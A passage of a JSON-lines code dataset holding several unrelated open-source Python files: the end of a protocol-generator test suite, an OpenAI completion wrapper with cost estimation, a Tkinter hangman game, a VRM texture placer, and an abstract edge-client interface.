No matching close bracket ']' for the open bracket at pt:set[\",\n )\n\n def test_union_sub_type_to_protobuf_variable_name(\n self,\n ):\n \"\"\"Test the '_union_sub_type_to_protobuf_variable_name' method\"\"\"\n content_name = \"proposal\"\n\n content_type_1 = \"FrozenSet[int]\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_1)\n == \"proposal_type_set_of_int\"\n )\n\n content_type_2 = \"Tuple[str, ...]\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_2)\n == \"proposal_type_list_of_str\"\n )\n\n content_type_3 = \"Dict[bool, float]\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_3)\n == \"proposal_type_dict_of_bool_float\"\n )\n\n content_type_4 = \"int\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_4)\n == \"proposal_type_int\"\n )\n\n content_type_5 = \"DataModel\"\n assert (\n _union_sub_type_to_protobuf_variable_name(content_name, content_type_5)\n == \"proposal_type_DataModel\"\n )\n\n def test_python_pt_or_ct_type_to_proto_type(\n self,\n ):\n \"\"\"Test the '_python_pt_or_ct_type_to_proto_type' method\"\"\"\n content_type_bytes = \"bytes\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_bytes) == \"bytes\"\n\n content_type_int = \"int\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_int) == \"int64\"\n\n content_type_float = \"float\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_float) == \"float\"\n\n content_type_bool = \"bool\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_bool) == \"bool\"\n\n content_type_str = \"str\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_str) == \"string\"\n\n content_type_ct = \"Query\"\n assert _python_pt_or_ct_type_to_proto_type(content_type_ct) == \"Query\"\n\n def test_includes_custom_type(\n self,\n ):\n \"\"\"Test the '_includes_custom_type' method\"\"\"\n content_type_includes_1 = \"Optional[DataModel]\"\n assert _includes_custom_type(content_type_includes_1) is True\n\n content_type_includes_2 = \"Union[int, DataModel]\"\n assert _includes_custom_type(content_type_includes_2) is True\n\n content_type_includes_3 = \"Optional[Union[int, float, DataModel, Query, float]]\"\n assert _includes_custom_type(content_type_includes_3) is True\n\n content_type_not_includes_1 = \"Optional[int]\"\n assert _includes_custom_type(content_type_not_includes_1) is False\n\n content_type_not_includes_2 = \"Union[int, float, str]\"\n assert _includes_custom_type(content_type_not_includes_2) is False\n\n content_type_not_includes_3 = (\n \"Optional[Union[int, float, FrozenSet[int], Tuple[bool, ...], float]]\"\n )\n assert _includes_custom_type(content_type_not_includes_3) is False\n\n @mock.patch(\"shutil.which\", return_value=\"some string\")\n def test_is_installed_positive(self, mocked_shutil_which):\n \"\"\"Positive test for the 'is_installed' method\"\"\"\n assert is_installed(\"some_programme\") is True\n\n @mock.patch(\"shutil.which\", return_value=None)\n def test_is_installed_negative(self, mocked_shutil_which):\n \"\"\"Negative test for the 'is_installed' method: programme is not installed\"\"\"\n assert is_installed(\"some_programme\") is False\n\n def test_base_protolint_command(self):\n \"\"\"Tests the 'base_protolint_command' method\"\"\"\n assert (\n base_protolint_command() == \"protolint\"\n or \"PATH=${PATH}:${GOPATH}/bin/:~/go/bin protolint\"\n )\n\n @mock.patch(\"aea.protocols.generator.common.is_installed\", return_value=True)\n def 
test_check_prerequisites_positive(self, mocked_is_installed):\n \"\"\"Positive test for the 'check_prerequisites' method\"\"\"\n try:\n check_prerequisites()\n except FileNotFoundError:\n self.fail()\n\n @mock.patch(\n \"aea.protocols.generator.common.is_installed\",\n side_effect=black_is_not_installed_side_effect,\n )\n def test_check_prerequisites_negative_black_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: black isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n @mock.patch(\n \"aea.protocols.generator.common.is_installed\",\n side_effect=isort_is_not_installed_side_effect,\n )\n def test_check_prerequisites_negative_isort_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: isort isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n @mock.patch(\n \"aea.protocols.generator.common.subprocess.call\",\n return_value=1,\n )\n def test_check_prerequisites_negative_protolint_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: protolint isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n @mock.patch(\n \"aea.protocols.generator.common.is_installed\",\n side_effect=protoc_is_not_installed_side_effect,\n )\n def test_check_prerequisites_negative_protoc_is_not_installed(\n self, mocked_is_installed\n ):\n \"\"\"Negative test for the 'check_prerequisites' method: protoc isn't installed\"\"\"\n with self.assertRaises(FileNotFoundError):\n check_prerequisites()\n\n def test_load_protocol_specification(\n self,\n ):\n \"\"\"Test the 'load_protocol_specification' method\"\"\"\n spec = load_protocol_specification(PATH_TO_T_PROTOCOL_SPECIFICATION)\n assert spec.name == T_PROTOCOL_NAME\n assert spec.version == \"0.1.0\"\n assert spec.author == \"fetchai\"\n assert spec.license == \"Apache-2.0\"\n assert spec.aea_version == \">=1.0.0, <2.0.0\"\n assert spec.description == \"A protocol for testing purposes.\"\n assert spec.speech_acts is not None\n assert spec.protobuf_snippets is not None and spec.protobuf_snippets != \"\"\n\n def test_create_protocol_file(\n self,\n ):\n \"\"\"Test the '_create_protocol_file' method\"\"\"\n file_name = \"temp_file\"\n file_content = \"this is a temporary file\"\n\n _create_protocol_file(self.t, file_name, file_content)\n path_to_the_file = os.path.join(self.t, file_name)\n\n assert Path(path_to_the_file).exists()\n assert Path(path_to_the_file).read_text() == file_content\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_black_formatting(self, mocked_subprocess):\n \"\"\"Test the 'try_run_black_formatting' method\"\"\"\n try_run_black_formatting(\"some_path\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_isort_formatting(self, mocked_subprocess):\n \"\"\"Test the 'try_run_isort_formatting' method\"\"\"\n try_run_isort_formatting(\"some_path\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_protoc(self, mocked_subprocess):\n \"\"\"Test the 'try_run_protoc' method\"\"\"\n try_run_protoc(\"some_path\", \"some_name\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"subprocess.run\")\n def test_try_run_protolint(self, mocked_subprocess):\n \"\"\"Test the 'try_run_protolint' method\"\"\"\n
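 # 'subprocess.run' is patched above, so this only verifies that protolint is invoked exactly once.\n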
 try_run_protolint(\"some_path\", \"some_name\")\n mocked_subprocess.assert_called_once()\n\n @mock.patch(\"aea.protocols.generator.common.try_run_protoc\")\n def test_check_protobuf_using_protoc_positive(self, mocked_try_run_protoc):\n \"\"\"Positive test for the 'check_protobuf_using_protoc' method\"\"\"\n protocol_name = \"protocol_name\"\n file_name = protocol_name + \"_pb2.py\"\n\n new_file = open(os.path.join(self.t, file_name), \"w+\")\n new_file.close()\n result, msg = check_protobuf_using_protoc(self.t, protocol_name)\n\n assert not Path(self.t, file_name).exists()\n assert result is True\n assert msg == \"protobuf file is valid\"\n\n @mock.patch(\n \"subprocess.run\",\n side_effect=CalledProcessError(\n 1, \"some_command\", stderr=\"name.proto:12:45: some_protoc_error\\n\"\n ),\n )\n def test_check_protobuf_using_protoc_negative(self, mocked_subprocess):\n \"\"\"Negative test for the 'check_protobuf_using_protoc' method: protoc has some errors\"\"\"\n result, msg = check_protobuf_using_protoc(\"some_path\", \"name\")\n assert result is False\n assert msg == \"some_protoc_error\"\n\n @mock.patch(\"aea.protocols.generator.common.try_run_protoc\")\n def test_compile_protobuf_using_protoc_positive(self, mocked_try_run_protoc):\n \"\"\"Positive test for the 'compile_protobuf_using_protoc' method\"\"\"\n protocol_name = \"protocol_name\"\n\n result, msg = compile_protobuf_using_protoc(self.t, protocol_name, \"python\")\n\n mocked_try_run_protoc.assert_called_once()\n assert result is True\n assert msg == \"protobuf schema successfully compiled\"\n\n @mock.patch(\n \"subprocess.run\",\n side_effect=CalledProcessError(\n 1, \"some_command\", stderr=\"protocol_name.proto:12:45: some_protoc_error\\n\"\n ),\n )\n def test_compile_protobuf_using_protoc_negative(self, mocked_subprocess):\n \"\"\"Negative test for the 'compile_protobuf_using_protoc' method: protoc has some errors\"\"\"\n protocol_name = \"protocol_name\"\n result, msg = compile_protobuf_using_protoc(self.t, protocol_name, \"python\")\n assert result is False\n assert msg == \"some_protoc_error\"\n\n @mock.patch(\"aea.protocols.generator.common.try_run_protolint\")\n def test_apply_protolint_positive(self, mocked_try_run_protoc):\n \"\"\"Positive test for the 'apply_protolint' method\"\"\"\n protocol_name = \"protocol_name\"\n\n result, msg = apply_protolint(self.t, protocol_name)\n\n mocked_try_run_protoc.assert_called_once()\n assert result is True\n assert msg == \"protolint has no output\"\n\n @mock.patch(\n \"subprocess.run\",\n side_effect=CalledProcessError(\n 1,\n \"some_command\",\n stderr=\"protocol_name.proto:12:45: some_protoc_error\\nprotocol_name.proto:12:45: incorrect indentation style ...\",\n ),\n )\n def test_apply_protolint_negative(self, mocked_subprocess):\n \"\"\"Negative test for the 'apply_protolint' method: protolint has some errors\"\"\"\n protocol_name = \"protocol_name\"\n result, msg = apply_protolint(self.t, protocol_name)\n assert result is False\n assert msg == \"protocol_name.proto:12:45: some_protoc_error\"\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n os.chdir(cls.cwd)\n try:\n shutil.rmtree(cls.t)\n except (OSError, IOError):\n pass\n","repo_name":"fetchai/agents-aea","sub_path":"tests/test_aea/test_protocols/test_generator/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":20321,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"68"}
{"seq_id":"5044456556","text":"\"\"\"Contains classes for querying large language models.\"\"\"\nfrom math 
import ceil\nimport os\nimport time\nfrom tqdm import tqdm\nfrom abc import ABC, abstractmethod\n\nimport openai\n\ngpt_costs_per_thousand = {\n 'davinci': 0.0200,\n 'curie': 0.0020,\n 'babbage': 0.0005,\n 'ada': 0.0004\n}\n\n\ndef model_from_config(config, disable_tqdm=True):\n \"\"\"Returns a model based on the config.\"\"\"\n model_type = config[\"name\"]\n if model_type == \"GPT_forward\":\n return GPT_Forward(config, disable_tqdm=disable_tqdm)\n elif model_type == \"GPT_insert\":\n return GPT_Insert(config, disable_tqdm=disable_tqdm)\n raise ValueError(f\"Unknown model type: {model_type}\")\n\n\nclass LLM(ABC):\n \"\"\"Abstract base class for large language models.\"\"\"\n\n @abstractmethod\n def generate_text(self, prompt):\n \"\"\"Generates text from the model.\n Parameters:\n prompt: The prompt to use. This can be a string or a list of strings.\n Returns:\n A list of strings.\n \"\"\"\n pass\n\n @abstractmethod\n def log_probs(self, text, log_prob_range):\n \"\"\"Returns the log probs of the text.\n Parameters:\n text: The text to get the log probs of. This can be a string or a list of strings.\n log_prob_range: The range of characters within each string to get the log_probs of. \n This is a list of tuples of the form (start, end).\n Returns:\n A list of log probs.\n \"\"\"\n pass\n\n\nclass GPT_Forward(LLM):\n \"\"\"Wrapper for GPT-3.\"\"\"\n\n def __init__(self, config, needs_confirmation=False, disable_tqdm=True):\n \"\"\"Initializes the model.\"\"\"\n self.config = config\n self.needs_confirmation = needs_confirmation\n self.disable_tqdm = disable_tqdm\n\n def confirm_cost(self, texts, n, max_tokens):\n total_estimated_cost = 0\n for text in texts:\n total_estimated_cost += gpt_get_estimated_cost(\n self.config, text, max_tokens) * n\n print(f\"Estimated cost: ${total_estimated_cost:.2f}\")\n # Ask the user to confirm in the command line\n if os.getenv(\"LLM_SKIP_CONFIRM\") is None:\n confirm = input(\"Continue? 
(y/n) \")\n if confirm != 'y':\n raise Exception(\"Aborted.\")\n\n def auto_reduce_n(self, fn, prompt, n):\n \"\"\"Reduces n by half until the function succeeds.\"\"\"\n try:\n return fn(prompt, n)\n except BatchSizeException as e:\n if n == 1:\n raise e\n return self.auto_reduce_n(fn, prompt, n // 2) + self.auto_reduce_n(fn, prompt, n // 2)\n\n def generate_text(self, prompt, n):\n if not isinstance(prompt, list):\n prompt = [prompt]\n if self.needs_confirmation:\n self.confirm_cost(\n prompt, n, self.config['gpt_config']['max_tokens'])\n batch_size = self.config['batch_size']\n prompt_batches = [prompt[i:i + batch_size]\n for i in range(0, len(prompt), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Generating {len(prompt) * n} completions, \"\n f\"split into {len(prompt_batches)} batches of size {batch_size * n}\")\n text = []\n\n for prompt_batch in tqdm(prompt_batches, disable=self.disable_tqdm):\n text += self.auto_reduce_n(self.__generate_text, prompt_batch, n)\n return text\n\n def complete(self, prompt, n):\n \"\"\"Generates text from the model and returns the log prob data.\"\"\"\n if not isinstance(prompt, list):\n prompt = [prompt]\n batch_size = self.config['batch_size']\n prompt_batches = [prompt[i:i + batch_size]\n for i in range(0, len(prompt), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Generating {len(prompt) * n} completions, \"\n f\"split into {len(prompt_batches)} batches of size {batch_size * n}\")\n res = []\n for prompt_batch in tqdm(prompt_batches, disable=self.disable_tqdm):\n res += self.__complete(prompt_batch, n)\n return res\n\n def log_probs(self, text, log_prob_range=None):\n \"\"\"Returns the log probs of the text.\"\"\"\n if not isinstance(text, list):\n text = [text]\n if self.needs_confirmation:\n self.confirm_cost(text, 1, 0)\n batch_size = self.config['batch_size']\n text_batches = [text[i:i + batch_size]\n for i in range(0, len(text), batch_size)]\n if log_prob_range is None:\n log_prob_range_batches = [None] * len(text)\n else:\n assert len(log_prob_range) == len(text)\n log_prob_range_batches = [log_prob_range[i:i + batch_size]\n for i in range(0, len(log_prob_range), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Getting log probs for {len(text)} strings, \"\n f\"split into {len(text_batches)} batches of (maximum) size {batch_size}\")\n log_probs = []\n tokens = []\n for text_batch, log_prob_range in tqdm(list(zip(text_batches, log_prob_range_batches)),\n disable=self.disable_tqdm):\n log_probs_batch, tokens_batch = self.__log_probs(\n text_batch, log_prob_range)\n log_probs += log_probs_batch\n tokens += tokens_batch\n return log_probs, tokens\n\n def __generate_text(self, prompt, n):\n \"\"\"Generates text from the model.\"\"\"\n if not isinstance(prompt, list):\n text = [prompt]\n config = self.config['gpt_config'].copy()\n config['n'] = n\n # If there are any [APE] tokens in the prompts, remove them\n for i in range(len(prompt)):\n prompt[i] = prompt[i].replace('[APE]', '').strip()\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=prompt)\n except Exception as e:\n if 'is greater than the maximum' in str(e):\n raise BatchSizeException()\n print(e)\n print('Retrying...')\n time.sleep(5)\n\n return [response['choices'][i]['text'] for i in range(len(response['choices']))]\n\n def __complete(self, prompt, n):\n \"\"\"Generates text from the model and returns the log prob data.\"\"\"\n if not 
 if not isinstance(prompt, list):\n prompt = [prompt]\n config = self.config['gpt_config'].copy()\n config['n'] = n\n # If there are any [APE] tokens in the prompts, remove them\n for i in range(len(prompt)):\n prompt[i] = prompt[i].replace('[APE]', '').strip()\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=prompt)\n except Exception as e:\n print(e)\n print('Retrying...')\n time.sleep(5)\n return response['choices']\n\n def __log_probs(self, text, log_prob_range=None):\n \"\"\"Returns the log probs of the text.\"\"\"\n if not isinstance(text, list):\n text = [text]\n if log_prob_range is not None:\n for i in range(len(text)):\n lower_index, upper_index = log_prob_range[i]\n assert lower_index < upper_index\n assert lower_index >= 0\n assert upper_index - 1 < len(text[i])\n config = self.config['gpt_config'].copy()\n config['logprobs'] = 1\n config['echo'] = True\n config['max_tokens'] = 0\n if isinstance(text, list):\n text = [f'\\n{text[i]}' for i in range(len(text))]\n else:\n text = f'\\n{text}'\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=text)\n except Exception as e:\n print(e)\n print('Retrying...')\n time.sleep(5)\n log_probs = [response['choices'][i]['logprobs']['token_logprobs'][1:]\n for i in range(len(response['choices']))]\n tokens = [response['choices'][i]['logprobs']['tokens'][1:]\n for i in range(len(response['choices']))]\n offsets = [response['choices'][i]['logprobs']['text_offset'][1:]\n for i in range(len(response['choices']))]\n\n # Subtract 1 from the offsets to account for the newline\n for i in range(len(offsets)):\n offsets[i] = [offset - 1 for offset in offsets[i]]\n\n if log_prob_range is not None:\n # First, we need to find the indices of the tokens in the log probs\n # that correspond to the tokens in the log_prob_range\n for i in range(len(log_probs)):\n lower_index, upper_index = self.get_token_indices(\n offsets[i], log_prob_range[i])\n log_probs[i] = log_probs[i][lower_index:upper_index]\n tokens[i] = tokens[i][lower_index:upper_index]\n\n return log_probs, tokens\n\n def get_token_indices(self, offsets, log_prob_range):\n \"\"\"Returns the indices of the tokens in the log probs that correspond to the tokens in the log_prob_range.\"\"\"\n # For the lower index, find the highest index that is less than or equal to the lower index\n lower_index = 0\n for i in range(len(offsets)):\n if offsets[i] <= log_prob_range[0]:\n lower_index = i\n else:\n break\n\n upper_index = len(offsets)\n for i in range(len(offsets)):\n if offsets[i] >= log_prob_range[1]:\n upper_index = i\n break\n\n return lower_index, upper_index\n\n\nclass GPT_Insert(LLM):\n\n def __init__(self, config, needs_confirmation=False, disable_tqdm=True):\n \"\"\"Initializes the model.\"\"\"\n self.config = config\n self.needs_confirmation = needs_confirmation\n self.disable_tqdm = disable_tqdm\n\n def confirm_cost(self, texts, n, max_tokens):\n total_estimated_cost = 0\n for text in texts:\n total_estimated_cost += gpt_get_estimated_cost(\n self.config, text, max_tokens) * n\n print(f\"Estimated cost: ${total_estimated_cost:.2f}\")\n # Ask the user to confirm in the command line\n
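 # Setting the LLM_SKIP_CONFIRM environment variable bypasses this interactive prompt.\n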
(y/n) \")\n if confirm != 'y':\n raise Exception(\"Aborted.\")\n\n def auto_reduce_n(self, fn, prompt, n):\n \"\"\"Reduces n by half until the function succeeds.\"\"\"\n try:\n return fn(prompt, n)\n except BatchSizeException as e:\n if n == 1:\n raise e\n return self.auto_reduce_n(fn, prompt, n // 2) + self.auto_reduce_n(fn, prompt, n // 2)\n\n def generate_text(self, prompt, n):\n if not isinstance(prompt, list):\n prompt = [prompt]\n if self.needs_confirmation:\n self.confirm_cost(\n prompt, n, self.config['gpt_config']['max_tokens'])\n batch_size = self.config['batch_size']\n assert batch_size == 1\n prompt_batches = [prompt[i:i + batch_size]\n for i in range(0, len(prompt), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Generating {len(prompt) * n} completions, split into {len(prompt_batches)} batches of (maximum) size {batch_size * n}\")\n text = []\n for prompt_batch in tqdm(prompt_batches, disable=self.disable_tqdm):\n text += self.auto_reduce_n(self.__generate_text, prompt_batch, n)\n return text\n\n def log_probs(self, text, log_prob_range=None):\n raise NotImplementedError\n\n def __generate_text(self, prompt, n):\n \"\"\"Generates text from the model.\"\"\"\n config = self.config['gpt_config'].copy()\n config['n'] = n\n # Split prompts into prefixes and suffixes with the [APE] token (do not include the [APE] token in the suffix)\n prefix = prompt[0].split('[APE]')[0]\n suffix = prompt[0].split('[APE]')[1]\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=prefix, suffix=suffix)\n except Exception as e:\n print(e)\n print('Retrying...')\n time.sleep(5)\n\n # Remove suffix from the generated text\n texts = [response['choices'][i]['text'].replace(suffix, '') for i in range(len(response['choices']))]\n return texts\n\n\ndef gpt_get_estimated_cost(config, prompt, max_tokens):\n \"\"\"Uses the current API costs/1000 tokens to estimate the cost of generating text from the model.\"\"\"\n # Get rid of [APE] token\n prompt = prompt.replace('[APE]', '')\n # Get the number of tokens in the prompt\n n_prompt_tokens = len(prompt) // 4\n # Get the number of tokens in the generated text\n total_tokens = n_prompt_tokens + max_tokens\n engine = config['gpt_config']['model'].split('-')[1]\n costs_per_thousand = gpt_costs_per_thousand\n if engine not in costs_per_thousand:\n # Try as if it is a fine-tuned model\n engine = config['gpt_config']['model'].split(':')[0]\n costs_per_thousand = {\n 'davinci': 0.1200,\n 'curie': 0.0120,\n 'babbage': 0.0024,\n 'ada': 0.0016\n }\n price = costs_per_thousand[engine] * total_tokens / 1000\n return price\n\n\nclass BatchSizeException(Exception):\n pass\n","repo_name":"OpenBMB/BMTools","sub_path":"bmtools/tools/db_diag/utils/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":13906,"program_lang":"python","lang":"en","doc_type":"code","stars":2723,"dataset":"github-code","pt":"68"} +{"seq_id":"23777995784","text":"# -*- coding: utf-8 -*-\n#Fabricio de Lima Ribeiro\n#12/11/2020\n#Jogo da forca\n\nfrom tkinter import *\n\ndef jogar():\n\n\tglobal palavra\n\tpalavra = txt_palavra.get()\n\ttxt_palavra.delete(0, 'end')\n\tglobal tamanho\n\ttamanho = len(palavra)\n\t\n\tglobal label\n\tlabel = {}\n\n\tfor i in range(0, tamanho):\n\t lb = Label(app, text=\" ___ \")\n\t lb.place(x=i*30, y=120)\n\t label[i] = lb\n\n\ndef advinhar():\n\tletra = txt_letra.get()\n\ttxt_letra.delete(0, 'end')\n\n\tfor i in range(0, tamanho):\n\t\tif letra == 
\tfor i in range(0, tamanho):\n\t\tif letra == palavra[i]:\n\t\t\tlabel[i]['text'] = palavra[i]\n\n\napp = Tk()\napp.title(\"Jogo da forca\")\napp.geometry(\"500x300\")\n\n# Enter the word\nlb_1 = Label(app, text=\"Entre com a palavra: \")\nlb_1.place(x=5, y=6)\n\ntxt_palavra = Entry(app, bg=\"white\", width=15)\ntxt_palavra.place(x=150, y=7)\n\nbtn_jogar = Button(app, text=\"Jogar\", command=jogar)\nbtn_jogar.place(x=280, y=4)\n\n# Enter a letter\nlb_3 = Label(app, text=\"Entre com uma letra: \")\nlb_3.place(x=5, y=56)\n\ntxt_letra = Entry(app, bg=\"white\", width=15)\ntxt_letra.place(x=150, y=57)\n\nbtn_letra = Button(app, text=\"advinhar\", command=advinhar)\nbtn_letra.place(x=280, y=54)\n\napp.mainloop()","repo_name":"fabricioitajuba/Python","sub_path":"Jogos/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"2379478993","text":"#!/usr/bin/env python\nfrom typing import List\n\n\ndef startswith(start_match: str, targets: List[str]) -> bool:\n # True if any element of the list starts with start_match\n for e in targets:\n if e.startswith(start_match):\n return True\n return False\n\n\ndef contains(start_match: str, targets: List[str]) -> bool:\n # True if any element of the list contains start_match\n for e in targets:\n if start_match in e:\n return True\n return False\n\n\ndef get_cloth_place(gltf: dict) -> dict:\n \"\"\"\n Decide the placement of the clothing textures\n :param gltf: glTF object (including the VRM extension)\n :return: placement positions and sizes\n \"\"\"\n material_names = [material['name'] for material in gltf['materials']]\n has_tops = contains('_Tops_', material_names)\n has_accessory = contains('_Accessory_', material_names)\n has_shoes = contains('_Shoes_', material_names)\n has_bottom = contains('_Bottoms_', material_names)\n is_skirt = startswith('F00_001_01_Bottoms_', material_names) or startswith('M00_003_01_Bottoms_', material_names)\n\n place = {}\n main = None # material to merge into\n ox, oy = 0, 0 # offset\n\n if has_bottom:\n main = main or '_Bottoms_'\n place['_Bottoms_'] = {'pos': (0, oy), 'size': (1024, 1024)}\n oy = 1024\n if is_skirt:\n place['_Bottoms_']['size'] = (1024, 512)\n oy = 512\n\n if has_shoes:\n main = main or '_Shoes_'\n place['_Shoes_'] = {'pos': (0, oy), 'size': (512, 512)}\n ox = ox + 512\n\n if has_accessory:\n main = main or '_Accessory_'\n place['_Accessory_'] = {'pos': (512, oy), 'size': (512, 512)}\n\n if not main:\n return {} # bare body without clothing\n\n return {'main': main, 'place': place}\n","repo_name":"hirune4791dev/VReducer","sub_path":"vrm/placer.py","file_name":"placer.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"}
{"seq_id":"41567907350","text":"from abc import ABCMeta\nfrom abc import abstractmethod\nfrom enum import Enum\n\n\n# INTERFACE\n\nclass EdgeClient(object):\n \"\"\"The EdgeClient class is an interface for creating edge client classes.\"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def connect(self):\n \"\"\"Connect to the core.\"\"\"\n raise NotImplementedError('You must define \"connect()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def disconnect(self):\n \"\"\"Disconnect from the core.\"\"\"\n raise NotImplementedError('You must define \"disconnect()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def publish(self, topic, payload, qos):\n \"\"\"Publish a new message to the desired topic with the given quality of\n service.\n\n :param topic: Topic name to publish to.\n :type topic: str\n\n :param payload: Payload to publish (JSON formatted string).\n 
:type payload: str\n\n :param qos: Quality of Service. Could be \"0\" or \"1\".\n :type qos: int\n \"\"\"\n raise NotImplementedError('You must define \"publish()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def subscribe(self, topic, qos, callback):\n \"\"\"Subscribe to the desired topic with the given quality of service and\n register a callback to handle the published messages.\n\n :param topic: Topic name to publish to.\n :type topic: str\n\n :param qos: Quality of Service. Could be \"0\" or \"1\".\n :type qos: int\n\n :param callback: Function to be called when a new message for the\n subscribed topic comes in.\n \"\"\"\n raise NotImplementedError('You must define \"subscribe()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def unsubscribe(self, topic):\n \"\"\"Unsubscribe from the desired topic.\n\n :param topic: Topic name to unsubscribe from.\n :type topic: str\n \"\"\"\n raise NotImplementedError('You must define \"unsubscribe()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def get_shadow_state(self, callback, timeout_s):\n \"\"\"Get the state of the shadow client.\n\n Retrieve the device shadow JSON document from the cloud by publishing an\n empty JSON document to the corresponding shadow topics.\n\n :param callback: Function to be called when the response for a shadow\n request comes back.\n\n :param timeout_s: Timeout in seconds to perform the request.\n :type timeout_s: int\n \"\"\"\n raise NotImplementedError('You must define \"get_shadow()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def update_shadow_state(self, payload, callback, timeout_s):\n \"\"\"Update the state of the shadow client.\n\n Update the device shadow JSON document string on the cloud by publishing\n the provided JSON document to the corresponding shadow topics.\n\n :param payload: JSON document string used to update the shadow JSON\n document on the cloud.\n :type payload: json\n\n :param callback: Function to be called when the response for a shadow\n request comes back.\n\n :param timeout_s: Timeout in seconds to perform the request.\n :type timeout_s: int\n \"\"\"\n raise NotImplementedError('You must define \"update_shadow()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def delete_shadow_state(self, callback, timeout_s):\n \"\"\"Delete the state of the shadow client.\n \n Delete the device shadow from the cloud by publishing an empty JSON\n document to the corresponding shadow topics.\n\n :param callback: Function to be called when the response for a shadow\n request comes back.\n\n :param timeout_s: Timeout in seconds to perform the request.\n :type timeout_s: int\n \"\"\"\n raise NotImplementedError('You must define \"delete_shadow()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def add_listener(self, listener):\n \"\"\"Add a listener.\n \n :param listener: Listener to be added.\n :type listener: :class:`edge_st_sdk.edge_client.EdgeClientListener`\n \"\"\"\n raise NotImplementedError('You must define \"add_listener()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def remove_listener(self, listener):\n \"\"\"Remove a listener.\n\n :param listener: Listener to be removed.\n :type listener: :class:`edge_st_sdk.edge_client.EdgeClientListener`\n \"\"\"\n raise NotImplementedError('You must define \"remove_listener()\" to use '\n 'the \"EdgeClient\" class.')\n\n @abstractmethod\n def _update_status(self, new_status):\n \"\"\"Update the status of the client.\n\n :param new_status: New 
status.\n :type new_status: :class:`edge_st_sdk.edge_client.EdgeClientStatus`\n \"\"\"\n raise NotImplementedError('You must define \"_update_client_status()\" to '\n 'use the \"EdgeClient\" class.')\n\n\nclass EdgeClientStatus(Enum):\n \"\"\"Status of the client.\"\"\"\n\n INIT = 'INIT'\n \"\"\"Dummy initial status.\"\"\"\n\n IDLE = 'IDLE'\n \"\"\"Waiting for a connection and sending advertising data.\"\"\"\n\n CONNECTING = 'CONNECTING'\n \"\"\"Opening a connection with the client.\"\"\"\n\n CONNECTED = 'CONNECTED'\n \"\"\"Connected to the client.\"\"\"\n\n DISCONNECTING = 'DISCONNECTING'\n \"\"\"Closing the connection to the client.\"\"\"\n\n UNREACHABLE = 'UNREACHABLE'\n \"\"\"The client disappeared without first disconnecting.\"\"\"\n\n\n# INTERFACES\n\nclass EdgeClientListener(object):\n \"\"\"Interface used by the :class:`edge_st_sdk.edge_client.EdgeClient` class\n to notify changes of a client's status.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def on_status_change(self, client, new_status, old_status):\n \"\"\"To be called whenever a client changes its status.\n\n :param client: Client that has changed its status.\n :type client: :class:`edge_st_sdk.edge_client.EdgeClient`\n\n :param new_status: New status.\n :type new_status: :class:`edge_st_sdk.edge_client.EdgeClientStatus`\n\n :param old_status: Old status.\n :type old_status: :class:`edge_st_sdk.edge_client.EdgeClientStatus`\n\n :raises NotImplementedError`: if the method has not been implemented.\n \"\"\"\n raise NotImplementedError('You must implement \"on_status_change()\" to '\n 'use the \"EdgeClientListener\" class.')\n","repo_name":"STMicroelectronics/EdgeSTSDK_Python","sub_path":"edge_st_sdk/edge_client.py","file_name":"edge_client.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"}
